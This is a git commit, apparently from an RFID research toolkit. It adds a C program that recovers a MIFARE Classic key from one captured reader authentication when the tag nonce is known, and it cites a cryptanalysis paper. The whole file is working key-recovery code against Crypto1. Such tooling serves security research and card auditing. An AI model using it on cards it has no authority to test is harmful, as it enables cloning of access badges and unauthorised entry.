Add : recovering partial nested authentication with known nT

2025-08-21 05:43:48 -07:00 · 2024-09-03 23:37:33 +02:00 · 2024-09-03 23:37:33 +02:00 · 28076af96d
commit 28076af96d
parent 17ddc2db82
5 changed files with 108 additions and 2 deletions
--- a/tools/mfc/card_reader/mfkey32nested.c
+++ b/tools/mfc/card_reader/mfkey32nested.c
@ -0,0 +1,69 @@
+//  Doegox, 2024, cf https://eprint.iacr.org/2024/1275 for more info
+
+#include <inttypes.h>
+#include <stdbool.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include "crapto1/crapto1.h"
+#include "util_posix.h"
+
+int main(int argc, char *argv[]) {
+    struct Crypto1State *s, *t;
+    uint64_t key;     // recovered key
+    uint32_t uid;     // serial number
+    uint32_t nt;      // tag nonce
+    uint32_t nt_enc;  // encrypted tag nonce
+    uint32_t nr_enc;  // encrypted reader nonce
+    uint32_t ar;      // reader response
+    uint32_t ar_enc;  // encrypted reader response
+    uint32_t ks0;     // keystream used to encrypt tag nonce
+    uint32_t ks2;     // keystream used to encrypt reader response
+
+    printf("MIFARE Classic key recovery - known nT scenario\n");
+    printf("Recover key from one reader authentication answer only\n");
+
+    if (argc != 6) {
+        printf("syntax: %s <uid> <nt> <{nt}> <{nr}> <{ar}>\n\n", argv[0]);
+        return 1;
+    }
+
+    sscanf(argv[1], "%x", &uid);
+    sscanf(argv[2], "%x", &nt);
+    sscanf(argv[3], "%x", &nt_enc);
+    sscanf(argv[4], "%x", &nr_enc);
+    sscanf(argv[5], "%x", &ar_enc);
+
+    printf("Recovering key for:\n");
+    printf("    uid: %08x\n", uid);
+    printf("     nt: %08x\n", nt);
+    printf("   {nt}: %08x\n", nt_enc);
+    printf("   {nr}: %08x\n", nr_enc);
+    printf("   {ar}: %08x\n", ar_enc);
+
+    printf("\nLFSR successor of the tag challenge:\n");
+    ar = prng_successor(nt, 64);
+    printf("     ar: %08x\n", ar);
+
+    printf("\nKeystream used to generate {nt}:\n");
+    ks0 = nt_enc ^ nt;
+    printf("    ks0: %08x\n", ks0);
+    printf("\nKeystream used to generate {ar}:\n");
+    ks2 = ar_enc ^ ar;
+    printf("    ks2: %08x\n", ks2);
+
+    s = lfsr_recovery32(ks0, uid ^ nt);
+
+    for (t = s; t->odd | t->even; ++t) {
+        crypto1_word(t, nr_enc, 1);
+        if (ks2 == crypto1_word(t, 0, 0)) {
+            lfsr_rollback_word(t, 0, 0);
+            lfsr_rollback_word(t, nr_enc, 1);
+            lfsr_rollback_word(t, uid ^ nt, 0);
+            crypto1_get_lfsr(t, &key);
+            printf("\nFound Key: [%012" PRIx64 "]\n\n", key);
+            break;
+        }
+    }
+    free(s);
+    return 0;
+}